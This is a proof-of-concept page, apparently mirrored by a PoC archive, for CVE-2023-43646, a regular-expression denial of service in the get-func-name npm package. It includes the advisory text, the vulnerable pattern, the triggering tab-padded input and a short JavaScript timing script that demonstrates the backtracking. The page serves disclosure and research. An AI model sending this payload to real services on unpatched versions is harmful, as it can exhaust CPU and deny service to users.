Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-43646 PoC — Inefficient Regular Expression Complexity in get-func-name

Source
https://github.com/200101WhoAmI/CVE-2023-43646
Associated Vulnerability
Title:Inefficient Regular Expression Complexity in get-func-name (CVE-2023-43646)
Description:get-func-name is a module to retrieve a function's name securely and consistently both in NodeJS and the browser. Versions prior to 2.0.1 are subject to a regular expression denial of service (redos) vulnerability which may lead to a denial of service when parsing malicious input. This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: '\t'.repeat(54773) + '\t/function/i'. This issue has been addressed in commit `f934b228b` which has been included in releases from 2.0.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
redos
Readme
# CVE-2023-43646



## 취약점 개요

- CVE-2023-43646

- CVSS : 8.6

- Sep 26, 2023

- ReDoS in node.js package

- rebob 프로젝트의 일환

## 취약점 설명

[github advisories](https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5)

```
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/
```

This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input:

```
'\t'.repeat(54773) + '\t/function/i'
```

Here is a simple PoC code to demonstrate the issue:

```
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");
```


[target package](https://www.npmjs.com/package/chai)
File Snapshot

 [4.0K]  /data/pocs/8c114d6d4e599998e64ea993724607373bad8c52
└── [1.0K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →